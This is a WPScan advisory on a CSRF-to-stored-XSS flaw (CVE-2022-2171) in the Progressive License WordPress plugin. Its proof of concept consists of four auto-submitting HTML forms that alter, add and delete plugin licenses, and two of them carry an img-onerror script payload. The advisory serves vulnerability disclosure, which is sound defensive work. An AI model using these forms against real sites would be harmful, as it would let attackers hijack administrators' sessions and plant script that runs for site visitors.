WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

Progressive License <= 1.1.0 - CSRF to Stored XSS

Description

The plugin is lacking any CSRF check when saving its settings, which could allow attackers to make a logged in admin change them. Furthermore, as the plugin allows arbitrary HTML to be inserted in one of the settings, this could lead to Stored XSS issue which will be triggered in the frontend as well.

Proof of Concept

<form id="test" action="https://example.com/wp-admin/options-general.php" method="POST">
    <input type="text" name="acc_data[timeframe_1][duration]" value="0">
    <input type="text" name="acc_data[timeframe_1][key]" value="test">
    <input type="text" name="acc_data[timeframe_expire][key]" value="none">
    <input type="text" name="show_images" value="yes">
    <input type="text" name="acc_action" value="update_settings">
    <input type="text" name="acc_infinity" value="∞">
    <input type="text" name="submit" value="Update License Settings">
</form>
<script>
    HTMLFormElement.prototype.submit.call(
        document.getElementById("test")
    );
</script>


<form id="test" action="https://example.com/wp-admin/options-general.php" method="POST">
    <input type="text" name="acc_license[name]" value="test">
    <input type="text" name="acc_license[url]" value="">
    <input type="text" name="acc_license[image]" value="">
    <input type="text" name="acc_license[rdf]" value="--><img src=x onerror=alert(1)>">
    <input type="text" name="acc_action" value="edited">
    <input type="text" name="acc_license_key" value="test">
    <input type="text" name="submit" value="Save Changes">
</form>
<script>
    HTMLFormElement.prototype.submit.call(
        document.getElementById("test")
    );
</script>


<form id="test" action="https://example.com/wp-admin/options-general.php" method="POST">
    <input type="text" name="delete_license" value="Delete">
    <input type="text" name="acc_license_key" value="test2">
    <input type="text" name="acc_action" value="delete">
</form>
<script>
    document.getElementById("test").submit();
</script>


<form id="test" action="https://example.com/wp-admin/options-general.php" method="POST">
    <input type="text" name="acc_license[name]" value="bbb">
    <input type="text" name="acc_license[url]" value="">
    <input type="text" name="acc_license[image]" value="">
    <input type="text" name="acc_license[rdf]" value="--><img src=x onerror=alert(1)>">
    <input type="text" name="acc_action" value="add">
    <input type="text" name="submit" value="Submit New License">
</form>
<script>
    HTMLFormElement.prototype.submit.call(
        document.getElementById("test")
    );
</script>

Affects Plugins

progressive-license
No known fix - plugin closed

References

CVE
CVE-2022-2171

Classification

Type

CSRF

OWASP top 10
A2: Broken Authentication and Session Management
CWE
CWE-352

Miscellaneous

Original Researcher

Daniel Ruf

Submitter

Daniel Ruf

Submitter website
https://daniel-ruf.de
Verified

Yes

WPVDB ID
11937296-7ecf-4b94-b274-06f7990dbede

Timeline

Publicly Published

2022-07-07 (about 1 years ago)

Added

2022-07-07 (about 1 years ago)

Last Updated

2023-04-10 (about 5 months ago)

Our Other Services

WPScan WordPress Security Plugin